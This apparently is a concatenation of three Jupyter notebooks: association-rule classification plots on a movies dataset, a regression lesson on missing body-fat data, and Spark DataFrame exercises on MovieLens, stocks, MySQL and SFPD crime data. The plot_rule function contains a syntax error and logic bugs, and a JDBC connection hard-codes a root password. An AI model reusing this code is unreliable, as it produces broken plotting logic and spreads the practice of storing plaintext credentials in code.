plt.style.use("seaborn-white")
fig, ax = plt.subplots(figsize=(40, 60))
ax.set_xlabel('Estimated Budget (1000$)')
ax.set_ylabel('A-List Celebrities')
for idx, r in enumerate(sorted(rules, reverse=True)):
plt.subplot(7, 4, idx + 1)
plot_rule(r, plt)
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=30)
# rule boundary lines
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel("r{}".format(idx), fontsize=40)
plt.savefig("../data/rule_plot.png")
print(len(transactionDB))
clfm1 = M1Algorithm(rules, transactionDB).build()
print(len(clfm1.rules))
clfm1 = M1Algorithm(rules, transactionDB).build()
print(len(clfm1.rules))
clfm1 = M1Algorithm(rules, transactionDB).build()
print(len(clfm1.rules))
clf = M1Algorithm(rules, transactionDB).build()
for r in clf.rules:
plot_rule(r, plt)
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
# rule boundary lines
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel('Estimated Budget (1000$)')
plt.ylabel('A-List Celebrities')
clfm1 = M1Algorithm(rules, transactionDB).build()
fig, ax = plt.subplots(figsize=(40, 24))
for idx, r in enumerate(clfm1.rules):
plt.subplot(3, 4, idx + 1)
for rule in clfm1.rules[:idx+1]:
plot_rule(rule, plt)
#plot_rule(r, plt)
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel("Krok {}".format(idx + 1), fontsize=40)
plt.savefig("../data/m1_rules.png")
len(clfm1.rules)
m2 = M2Algorithm(rules, transactionDB)
clfm2 = m2.build()
fig, ax = plt.subplots(figsize=(40, 16))
for idx, r in enumerate(clfm2.rules):
plt.subplot(2, 5, idx + 1)
for rule in clfm2.rules[:idx+1]:
plot_rule(rule, plt)
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel("Krok {}".format(idx + 1), fontsize=40)
plt.savefig("../data/m2_rules.png")
len(clfm2.rules)
clfm2.inspect().to_csv("../data/rulesframe.csv")
import sklearn.metrics as skmetrics
m1pred = clfm1.predict_all(transactionDB)
m2pred = clfm2.predict_all(transactionDB)
actual = transactionDB.classes
m1acc = skmetrics.accuracy_score(m1pred, actual)
m2acc = skmetrics.accuracy_score(m2pred, actual)
print("m1 acc", m1acc)
print("m2 acc", m2acc)
clfm1.rules == clfm2.rules
```
|
github_jupyter
|
%run ../../main.py
%matplotlib inline
from pyarc import CBA
from pyarc.algorithms import generateCARs, M1Algorithm, M2Algorithm
from pyarc.algorithms import createCARs
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from itertools import combinations
import itertools
import pandas as pd
import numpy
import re
movies = pd.read_csv("../data/movies.csv", sep=";")
movies_discr = movies.copy(True)
budget_bins = range(0, 350, 50)
budget_bins_names = [ "<{0};{1})".format(i, i + 50) for i in budget_bins[:-1] ]
celebrities_bins = range(0, 10, 2)
celebrities_bins_names = [ "<{0};{1})".format(i, i + 2) for i in celebrities_bins[:-1] ]
movies_discr['estimated-budget'] = pd.cut(movies['estimated-budget'], budget_bins, labels=budget_bins_names)
movies_discr['a-list-celebrities'] = pd.cut(movies['a-list-celebrities'], celebrities_bins, labels=celebrities_bins_names)
movies_discr.to_csv("../data/movies_discr.csv", sep=";")
transactionDB = TransactionDB.from_DataFrame(movies_discr, unique_transactions=True)
rules = generateCARs(transactionDB, support=5, confidence=50)
movies_vals = movies.get_values()
x = range(0, 350, 50)
y = range(1, 9)
x_points = list(map(lambda n: n[0], movies_vals))
y_points = list(map(lambda n: n[1], movies_vals))
data_class = list(movies['class'])
appearance = {
'box-office-bomb': ('brown', "o"),
'main-stream-hit': ('blue', "o"),
'critical-success': ('green', "o")
}
rule_appearance = {
'box-office-bomb': 'tan',
'main-stream-hit': 'aqua',
'critical-success': 'lightgreen'
}
plt.style.use('seaborn-white')
rules
len(transactionDB)
def plot_rule(qrule, plt):
interval_regex = "(?:<|\()(\d+(?:\.(?:\d)+)?);(\d+(?:\.(?:\d)+)?)(?:\)|>)"
lower_y = 0
area_y = celebrities_bins[-1]
lower_x = 0
area_x = budget_bins[-1]
antecedent = qrule.new_antecedent
if len(antecedent) != 0:
if antecedent[0][0] == "a-list-celebrities":
y = antecedent[0]
y_boundaries = re.search(interval_regex, y[1].string())
lower_y = float(y_boundaries.group(1))
upper_y = float(y_boundaries.group(2))
area_y = upper_y - lower_y
axis = plt.gca()
else:
x = antecedent[0]
x_boundaries = re.search(interval_regex, x[1].string())
lower_x = float(x_boundaries.group(1))
upper_x = float(x_boundaries.group(2))
area_x = upper_x - lower_x
if len(antecedent) > 1:
if antecedent[1][0] == "a-list-celebrities":
y = antecedent[0]
y_boundaries = re.search(interval_regex, y[1].string())
lower_y = float(y_boundaries.group(1))
upper_y = float(y_boundaries.group(2))
area_y = upper_y - lower_y
axis = plt.gca()
else:
x = .antecedent[1]
x_boundaries = re.search(interval_regex, x[1].string())
lower_x = float(x_boundaries.group(1))
upper_x = float(x_boundaries.group(2))
area_x = upper_x - lower_x
axis = plt.gca()
class_name = qrule.rule.consequent[1]
axis.add_patch(
patches.Rectangle((lower_x, lower_y), area_x, area_y, zorder=-2, facecolor=rule_appearance[class_name], alpha=rule.confidence)
)
plt.figure(figsize=(10, 5))
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
plt.xlabel('Estimated Budget (1000$)', fontsize=20)
plt.ylabel('A-List Celebrities', fontsize=20)
plt.savefig("../data/datacases.png")
print("rule count", len(rules))
movies_discr.head()
plt.figure(figsize=(10, 5))
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
# rule boundary lines
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel('Estimated Budget (1000$)', fontsize=20)
plt.ylabel('A-List Celebrities', fontsize=20)
plt.savefig("../data/datacases_discr.png")
print("rule count", len(rules))
from matplotlib2tikz import save as tikz_save
subplot_count = 1
plt.style.use("seaborn-white")
fig, ax = plt.subplots(figsize=(40, 60))
ax.set_xlabel('Estimated Budget (1000$)')
ax.set_ylabel('A-List Celebrities')
for idx, r in enumerate(sorted(rules, reverse=True)):
plt.subplot(7, 4, idx + 1)
plot_rule(r, plt)
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=30)
# rule boundary lines
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel("r{}".format(idx), fontsize=40)
plt.savefig("../data/rule_plot.png")
print(len(transactionDB))
clfm1 = M1Algorithm(rules, transactionDB).build()
print(len(clfm1.rules))
clfm1 = M1Algorithm(rules, transactionDB).build()
print(len(clfm1.rules))
clfm1 = M1Algorithm(rules, transactionDB).build()
print(len(clfm1.rules))
clf = M1Algorithm(rules, transactionDB).build()
for r in clf.rules:
plot_rule(r, plt)
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
# rule boundary lines
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel('Estimated Budget (1000$)')
plt.ylabel('A-List Celebrities')
clfm1 = M1Algorithm(rules, transactionDB).build()
fig, ax = plt.subplots(figsize=(40, 24))
for idx, r in enumerate(clfm1.rules):
plt.subplot(3, 4, idx + 1)
for rule in clfm1.rules[:idx+1]:
plot_rule(rule, plt)
#plot_rule(r, plt)
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel("Krok {}".format(idx + 1), fontsize=40)
plt.savefig("../data/m1_rules.png")
len(clfm1.rules)
m2 = M2Algorithm(rules, transactionDB)
clfm2 = m2.build()
fig, ax = plt.subplots(figsize=(40, 16))
for idx, r in enumerate(clfm2.rules):
plt.subplot(2, 5, idx + 1)
for rule in clfm2.rules[:idx+1]:
plot_rule(rule, plt)
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel("Krok {}".format(idx + 1), fontsize=40)
plt.savefig("../data/m2_rules.png")
len(clfm2.rules)
clfm2.inspect().to_csv("../data/rulesframe.csv")
import sklearn.metrics as skmetrics
m1pred = clfm1.predict_all(transactionDB)
m2pred = clfm2.predict_all(transactionDB)
actual = transactionDB.classes
m1acc = skmetrics.accuracy_score(m1pred, actual)
m2acc = skmetrics.accuracy_score(m2pred, actual)
print("m1 acc", m1acc)
print("m2 acc", m2acc)
clfm1.rules == clfm2.rules
| 0.173638 | 0.355243 |
## Missing Data Examples
In this notebook we will look at the effects missing data can have on conclusions you can draw from data. We will also go over some practical implementations for linear regressions in Python
```
# Includes and Standard Magic...
### Standard Magic and startup initializers.
# Load Numpy
import numpy as np
# Load MatPlotLib
import matplotlib
import matplotlib.pyplot as plt
# Load Pandas
import pandas as pd
# Load SQLITE
import sqlite3
# Load Stats
from scipy import stats
# This lets us show plots inline and also save PDF plots if we want them
%matplotlib inline
from matplotlib.backends.backend_pdf import PdfPages
matplotlib.style.use('fivethirtyeight')
# These two things are for Pandas, it widens the notebook and lets us display data easily.
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:95% !important; }</style>"))
# Show a ludicrus number of rows and columns
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
```
For this work we will be using data from: Generalized body composition prediction equation for men using simple measurement techniques", K.W. Penrose, A.G. Nelson, A.G. Fisher, FACSM, Human Performance research Center, Brigham Young University, Provo, Utah 84602 as listed in Medicine and Science in Sports and Exercise, vol. 17, no. 2, April 1985, p. 189.
[Data availabe here.](http://staff.pubhealth.ku.dk/~tag/Teaching/share/data/Bodyfat.html)
```
# Load the Penrose Data
df_penrose = pd.read_csv("./data/bodyfat.csv")
display(df_penrose.head())
# observations = ['Neck', 'Chest', 'Abdomen', 'Hip', 'Thigh', 'Knee', 'Ankle', 'Biceps', 'Forearm', 'Wrist']
observations = ['Age', 'Neck', 'Forearm', 'Wrist']
len(df_penrose)
```
Let's do some basic scatter plots first to see what's going on.
```
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
```
Let's say we want to look at some linear regressions of single variables to see what is going on! So let's plot some regression lines. Note that there are at least a few different ways -- [linregress](https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.linregress.html), [polyfit](https://docs.scipy.org/doc/numpy/reference/generated/numpy.polyfit.html), and [statsmodels](https://www.statsmodels.org/stable/index.html).
Here's a good article about it [Data science with Python: 8 ways to do linear regression and measure their speed](https://www.freecodecamp.org/news/data-science-with-python-8-ways-to-do-linear-regression-and-measure-their-speed-b5577d75f8b/).
```
# Let's do a basic Linear Regression on a Single Variable.
# Note that linregress p-value is whether or not the slope is 0, not if the correlation is significant.
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
slope, intercept, r_value, p_value, std_err = stats.linregress(df_penrose[o],df_penrose['bodyfat'])
line = slope * df_penrose[o] + intercept
diag_str = "p-value =" + str(round(p_value, 7)) + "\n" + "r-value =" + str(round(r_value, 7)) + "\nstd err. =" + str(round(std_err, 7))
df_penrose.plot.scatter(x=o, y='bodyfat', title=diag_str, ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
# Let's try the same data with polyfit -- note that poly fit can fit more complex functions.
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
x1, intercept = np.polyfit(df_penrose[o],df_penrose['bodyfat'], 1)
line = x1 * df_penrose[o] + intercept
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
# Let's try the same data with polyfit -- note that poly fit can fit more complex functions.
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
x2, x1, intercept = np.polyfit(df_penrose[o],df_penrose['bodyfat'], 2)
line = x2 * df_penrose[o]**2 + x1 * df_penrose[o] + intercept
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
```
What happens if we start to remove parts of the data -- is the relationship still as strong?
We can use the [pandas sample command](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.sample.html) to remove some of the dataframe.
```
# Let's do a basic Linear Regression on a Single Variable.
# Note that linregress p-value for the null-hyp that slope = 0.
df_test = df_penrose.sample(frac=0.30, replace=False)
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
slope, intercept, r_value, p_value, std_err = stats.linregress(df_test[o],df_test['bodyfat'])
line = slope * df_test[o] + intercept
diag_str = "p-value =" + str(round(p_value, 7)) + "\n" + "r-value =" + str(round(r_value, 7)) + "\nstd err. =" + str(round(std_err, 7))
df_test.plot.scatter(x=o, y='bodyfat', title=diag_str, ax=ax[i])
ax[i].plot(df_test[o], line, lw=1, ls='--', color='red')
```
If we want to determine if these correlations are significant under the missing data then we need to run bootstrap samples and see what happens.
```
results = {o:[] for o in observations}
for i,o in enumerate(observations):
for t in range(500):
df_test = df_penrose.sample(frac=0.30, replace=False)
slope, intercept, r_value, p_value, std_err = stats.linregress(df_test[o],df_test['bodyfat'])
#r,p = stats.pearsonr(df_test[o], df_test['bodyfat'])
results[o].append(p_value)
rs = pd.DataFrame(results)
ax = rs.boxplot()
ax.set_ylim([-0.01,0.17])
ax.axhline(y=0.05, lw=2, color='red')
plt.show()
```
## A More Complicated example with Statsmodels.
Statsmodels (you'll likely need to install it) gives a much more R-like interface to linear modeling. You can read [more about it here](https://www.statsmodels.org/stable/index.html).
```
import statsmodels.api as sm
df_ind = df_penrose[['Neck', 'Wrist']]
df_target = df_penrose['bodyfat']
X = df_ind
y = df_target
# Note the difference in argument order
# Call: endog, then exog (dependent, indepenednt)
model = sm.OLS(y, X).fit()
predictions = model.predict(X) # make the predictions by the model
# Print out the statistics
model.summary()
#fig, ax = plt.subplots(figsize=(12,8))
#fig = sm.graphics.plot_partregress(endog="bodyfat", exog_i=['Abdomen', 'Neck'], exog_others='', data=df_penrose)
```
We can also use the [single regressor plot](https://tedboy.github.io/statsmodels_doc/generated/statsmodels.graphics.api.plot_partregress.html#statsmodels.graphics.api.plot_partregress).
```
from statsmodels.graphics.regressionplots import plot_partregress
fig, ax = plt.subplots(figsize=(12,8))
plot_partregress(endog='bodyfat', exog_i='Neck', exog_others='', data=df_penrose, ax=ax)
plt.show()
```
If we have multiple elements in our regression then we need to use a different plot.
```
# Multiple regression plot
from statsmodels.graphics.regressionplots import plot_partregress_grid
fig = plt.figure(figsize=(8, 6))
plot_partregress_grid(model, fig=fig)
plt.show()
```
Another way to work with regressions and their plots is using the [Seaborn Regression Package](https://seaborn.pydata.org/tutorial/regression.html)
```
# Another way to do simple exploratory plots
import seaborn as sns
df_test = df_penrose.sample(frac=0.10, replace=False)
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
sns.regplot(x=o, y='bodyfat', data=df_test, ax=ax[i])
#g.axes.set_xlim(df_test[o].min()*.95,df_test[o].max()*1.05)
```
Another nice simulator to play with is [this one](https://ndirienzo.shinyapps.io/linear_regression_sim/) which is from [Prof. Nicholas DiRienzo](https://ischool.arizona.edu/people/nicholas-dirienzo) from ASU's School of Information
|
github_jupyter
|
# Includes and Standard Magic...
### Standard Magic and startup initializers.
# Load Numpy
import numpy as np
# Load MatPlotLib
import matplotlib
import matplotlib.pyplot as plt
# Load Pandas
import pandas as pd
# Load SQLITE
import sqlite3
# Load Stats
from scipy import stats
# This lets us show plots inline and also save PDF plots if we want them
%matplotlib inline
from matplotlib.backends.backend_pdf import PdfPages
matplotlib.style.use('fivethirtyeight')
# These two things are for Pandas, it widens the notebook and lets us display data easily.
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:95% !important; }</style>"))
# Show a ludicrus number of rows and columns
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
# Load the Penrose Data
df_penrose = pd.read_csv("./data/bodyfat.csv")
display(df_penrose.head())
# observations = ['Neck', 'Chest', 'Abdomen', 'Hip', 'Thigh', 'Knee', 'Ankle', 'Biceps', 'Forearm', 'Wrist']
observations = ['Age', 'Neck', 'Forearm', 'Wrist']
len(df_penrose)
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
# Let's do a basic Linear Regression on a Single Variable.
# Note that linregress p-value is whether or not the slope is 0, not if the correlation is significant.
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
slope, intercept, r_value, p_value, std_err = stats.linregress(df_penrose[o],df_penrose['bodyfat'])
line = slope * df_penrose[o] + intercept
diag_str = "p-value =" + str(round(p_value, 7)) + "\n" + "r-value =" + str(round(r_value, 7)) + "\nstd err. =" + str(round(std_err, 7))
df_penrose.plot.scatter(x=o, y='bodyfat', title=diag_str, ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
# Let's try the same data with polyfit -- note that poly fit can fit more complex functions.
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
x1, intercept = np.polyfit(df_penrose[o],df_penrose['bodyfat'], 1)
line = x1 * df_penrose[o] + intercept
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
# Let's try the same data with polyfit -- note that poly fit can fit more complex functions.
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
x2, x1, intercept = np.polyfit(df_penrose[o],df_penrose['bodyfat'], 2)
line = x2 * df_penrose[o]**2 + x1 * df_penrose[o] + intercept
df_penrose.plot.scatter(x=o, y='bodyfat', ax=ax[i])
ax[i].plot(df_penrose[o], line, lw=1, ls='--', color='red')
# Let's do a basic Linear Regression on a Single Variable.
# Note that linregress p-value for the null-hyp that slope = 0.
df_test = df_penrose.sample(frac=0.30, replace=False)
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
slope, intercept, r_value, p_value, std_err = stats.linregress(df_test[o],df_test['bodyfat'])
line = slope * df_test[o] + intercept
diag_str = "p-value =" + str(round(p_value, 7)) + "\n" + "r-value =" + str(round(r_value, 7)) + "\nstd err. =" + str(round(std_err, 7))
df_test.plot.scatter(x=o, y='bodyfat', title=diag_str, ax=ax[i])
ax[i].plot(df_test[o], line, lw=1, ls='--', color='red')
results = {o:[] for o in observations}
for i,o in enumerate(observations):
for t in range(500):
df_test = df_penrose.sample(frac=0.30, replace=False)
slope, intercept, r_value, p_value, std_err = stats.linregress(df_test[o],df_test['bodyfat'])
#r,p = stats.pearsonr(df_test[o], df_test['bodyfat'])
results[o].append(p_value)
rs = pd.DataFrame(results)
ax = rs.boxplot()
ax.set_ylim([-0.01,0.17])
ax.axhline(y=0.05, lw=2, color='red')
plt.show()
import statsmodels.api as sm
df_ind = df_penrose[['Neck', 'Wrist']]
df_target = df_penrose['bodyfat']
X = df_ind
y = df_target
# Note the difference in argument order
# Call: endog, then exog (dependent, indepenednt)
model = sm.OLS(y, X).fit()
predictions = model.predict(X) # make the predictions by the model
# Print out the statistics
model.summary()
#fig, ax = plt.subplots(figsize=(12,8))
#fig = sm.graphics.plot_partregress(endog="bodyfat", exog_i=['Abdomen', 'Neck'], exog_others='', data=df_penrose)
from statsmodels.graphics.regressionplots import plot_partregress
fig, ax = plt.subplots(figsize=(12,8))
plot_partregress(endog='bodyfat', exog_i='Neck', exog_others='', data=df_penrose, ax=ax)
plt.show()
# Multiple regression plot
from statsmodels.graphics.regressionplots import plot_partregress_grid
fig = plt.figure(figsize=(8, 6))
plot_partregress_grid(model, fig=fig)
plt.show()
# Another way to do simple exploratory plots
import seaborn as sns
df_test = df_penrose.sample(frac=0.10, replace=False)
fig, ax = plt.subplots(1, 4, figsize=(15,5))
for i,o in enumerate(observations):
sns.regplot(x=o, y='bodyfat', data=df_test, ax=ax[i])
#g.axes.set_xlim(df_test[o].min()*.95,df_test[o].max()*1.05)
| 0.79162 | 0.952882 |
# Processing data using Spark Dataframe with Pyspark
View spark version. If you get an error, you need to troubleshoot the reason further.
```
spark.version
```
### Exercise 1: use movielens dataset for the following exercise
1. Load movies.csv as movies dataframe. Cache the dataframe
2. Load ratings.csv as ratings dataframe. Cache the dataframe
3. Find the number of records in movies dataframe
4. Find the number of records in ratings dataframe
5. Validate the userId and movieId combination is unique
6. Find average rating and count of rating per movieId using ratings dataframe
7. Find top 10 movies based on the highest average ratings. Consider only those movies that have at least 100 ratings. Show movieId, title, average rating and rating count columns.
8. Show temporary views for current Spark session
9. Register movies dataframe and ratings dayaframe as movies and ratings temporary view respectively. Verify that you can see the new temporary views you just created.
10. Using SQL statement, solve the problem statement for step #7. Match the results from step #7.
Load Spark SQL functions, for example: count, avg, explode etc.
```
from pyspark.sql.functions import *
```
Location of movies dataset. You can download the dataset from here. Here we are using latest-small dataset.
```
home_dir = "/user/cloudera/movielens/"
```
Create a dataframe on movies.csv file
```
movies = (spark.read.format("csv")
.options(header = True, inferSchema = True)
.load(home_dir + "movies.csv")
.cache()) # Keep the dataframe in memory for faster processing
```
Show schema of movies dataframe
```
movies.printSchema()
movies.dtypes
```
Display a few sample view from movies Dataframe
```
movies.show(5)
```
Find the number of records in movies dataframe
```
movies.count()
```
Create ratings Dataframe using ratings.csv file
```
ratings = (spark.read.format("csv")
.options(header = True, inferSchema = True)
.load(home_dir + "ratings.csv")
.persist())
```
Print schema of ratings Dataframe
```
ratings.printSchema()
```
Show a few sample values from ratings dataframe
```
ratings.show(5)
```
Find the number of records in ratings
```
ratings.count()
```
Validate the movieId and ratingId combination is unique identifier in ratings table
```
ratings.groupBy("movieId", "userId").count().filter("count != 1").show()
```
As it shows that there is no userId and movieId combination that occurs more than once.
Find average rating of each movie for which there are at least 100 ratings. Order the result by average rating in decreasing order.
```
ratings_agg = (ratings
.groupBy(col("movieId"))
.agg(
count(col("movieId")).alias("count"),
avg(col("rating")).alias("avg_rating")
))
ratings_agg.show()
(ratings_agg
.alias("t1")
.join(movies.alias("t2"), col("t1.movieId") == col("t2.movieId"))
.filter("count > 100")
.orderBy(desc("avg_rating"))
.select("t1.movieId", "title", "avg_rating", "count")
.limit(10)
.show())
```
Show temporary views for current Spark session
```
sql("show tables").show()
movies.createOrReplaceTempView("movies")
ratings.createOrReplaceTempView("ratings")
sql("show tables").show()
```
Using SQL statement, find top 10 movies based on the highest average ratings. Consider only those movies that have at least 100 ratings. Show movieId, title, average rating and rating count columns.
```
sql("""
select
t1.movieId,
t1.title,
avg(t2.rating) avg_rating,
count(1) rating_count
from movies t1 join ratings t2 on t1.movieId = t2.movieId
group by t1.movieId, t1.title
having rating_count >= 100
order by avg_rating desc
limit 10
""").show()
```
# Find average rating of each genre (advanced)
```
genre_avg_rating = (ratings.alias("t1")
.join(movies.alias("t2"), col("t1.movieId") == col("t2.movieId"))
.select(col("rating"), explode(split("genres", r"\|")).alias("genre"))
.groupBy(col("genre"))
.agg(count(col("genre")).alias("count"), avg("rating").alias("avg_rating"))
.orderBy(desc("avg_rating")))
genre_avg_rating.show()
```
### Using matplotlib show barplot of average rating for each genre (Optional)
Loading matplotlib library
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
```
Convert spark dataframe to Pandas Dataframe.
```
df = genre_avg_rating.toPandas()
df.head()
```
Plot average rating for each genre
```
df.plot("genre", "avg_rating", "bar", title = "Barplot of avg rating by genre")
```
### Exercise 2: Use stocks.csv for the following execise
1. Load stocks.csv as stocks dataframe with scheme inferencing enabled. Cache the dataframe.
2. What are the data type for each columns?
3. Cast the date field of stocks dataframe as date type
4. What is the largest value in date column. You should get 2016-08-15.
5. Register the stocks dataframe as stocks temporary view.
5. Create a new dataframe, stocks_last10 with last 10 records for each stock. Select date, symbol and adjclose columns. You can use SQL statement and SQL window operation. [Hint: if you are not familiar with window operation in SQL, please refer this - https://databricks.com/blog/2015/07/15/introducing-window-functions-in-spark-sql.html]
6. Create a new dataframe stocks_pivot, by pivoting the stocks_last10 dataframe
7. Find difference between adjclose for each pair of consecutive days
```
stocks = (spark
.read
.format("csv")
.options(inferSchema = True, header = True)
.load("stocks")
.cache())
stocks.show()
stocks.printSchema()
stocks.withColumn("date", col("date").cast("date")).printSchema()
stocks = stocks.withColumn("date", col("date").cast("date"))
stocks.show()
stocks.orderBy(col("date").desc()).show(1)
stocks.createOrReplaceTempView("stocks")
stocks_last10 = sql("""
select
cast(t1.date as string),
t1.symbol,
t1.adjclose,
t1.row_num
from (select
*,
row_number() over (partition by symbol order by date desc) row_num
from stocks) t1 where t1.row_num <= 11
""")
stocks_last10.show()
stocks_pivot = stocks_last10.groupby("symbol").pivot("date").agg(max(col("adjclose")))
stocks_pivot.limit(10).toPandas()
columns = ["v" + str(i) for i in range(len(stocks_pivot.columns) - 1)]
columns.insert(0, "symbol")
columns
stocks_pivot = stocks_pivot.toDF(*columns)
stocks_pivot.limit(10).toPandas()
stocks_diff = stocks_pivot
for i in range(1, len(stocks_diff.columns) - 1):
stocks_diff = stocks_diff.withColumn(columns[i], col(columns[i]) - col(columns[i+1]))
stocks_diff = stocks_diff.drop(stocks_diff.columns[-1])
stocks_diff.limit(10).toPandas()
```
### Exercise 3: Read data from mysql
1. Create a dataframe - orders in Spark based on orders table in retail_db in mysql
2. Save the orders as parquet file in HDFS
3. Write a query joining customers table in mysql and orders parquet file in HDFS to find customers with most number of completed orders.
4. Save the orders dataframe as hive table. Verify that orders table is accessible in hive as well.
5. Delete the orders table from hive.
Create a dataframe - orders in Spark based on orders table in retail_db in mysql
```
orders = (spark
.read
.format("jdbc")
.option("url", "jdbc:mysql://localhost/retail_db")
.option("driver", "com.mysql.jdbc.Driver")
.option("dbtable", "orders")
.option("user", "root")
.option("password", "cloudera")
.load())
orders.show()
```
Save the orders as parquet file in HDFS
```
orders.write.format("parquet").mode("overwrite").save("orders")
```
Create a dataframe customers, based on the customers table in retail_db in mysql database.
```
customers = (spark
.read
.format("jdbc")
.option("url", "jdbc:mysql://localhost/retail_db")
.option("driver", "com.mysql.jdbc.Driver")
.option("dbtable", "customers")
.option("user", "root")
.option("password", "cloudera")
.load())
customers.show(5)
```
Create an orders based on the orders parquet file.
```
orders = spark.read.load("orders")
orders.show(6)
```
Write a query joining customers table in mysql and orders parquet file in HDFS to find most number of complet orders.
```
(orders.alias("t1")
.join(customers.alias("t2"), col("t1.order_customer_id") == col("t2.customer_id"))
.filter("t1.order_status == 'COMPLETE'")
.groupby("order_customer_id", "customer_fname", "customer_lname")
.count()
.orderBy(col("count").desc())
.show(10))
orders.write.mode("overwrite").saveAsTable("orders")
```
Verify the table in Hive. See whether orders table shows up as a permanent table. You can use use describe formatted <table> command to see what type of hive file it is.
```
sql("show tables").show()
spark.table("orders").show(10)
sql("describe formatted orders").toPandas()
```
Drop the table from hive
```
sql("drop table orders").show()
```
### Exercise 4: Use SFPD (San Francisco Police Department) Dataset for the following tasks
Filename: Crime_Incidents.csv.gz. Create a directory in your file system called called sfpd in your home path and put this file into the directory.
Tasks:
1. Create an dataframe with crime incident data.
3. Show the first 10 values of an dataframe
4. Check number of partitions of the dataframe
5. Find the number of incident records in the dataframe
6. Find the categories of incidents
7. Find total number of categories
8. What are the total number of incidents in each category
9. Find out on which day each of incidents have occurred most.
10. [Optional] Plot the frequency for each category of events
11. Createa a UDF to parse date field to conver it into a date type field
```
sfpd = (spark
.read
.format("csv")
.option("header", True)
.option("inferSchema", True)
.load("sfpd")
)
sfpd.printSchema()
sfpd.limit(5).toPandas() # Using pandas dataframe only for better tabular
sfpd.rdd.getNumPartitions()
type(sfpd.first())
categories = sfpd.select("Category").distinct().rdd.map(lambda r: r.Category)
print(categories.collect())
categories_count = categories.count()
categories_count
category_counts = sfpd.groupBy("Category").count().orderBy(col("count").desc())
category_counts.show(categories_count, False)
category_counts.toPandas().set_index("Category").plot.barh(figsize = (10, 15))
sfpd.select("date").show(10, False)
from datetime import datetime
s = "04/20/2005 12:00:00 AM"
d = datetime.strptime(s[:10], "%m/%d/%Y").date()
d
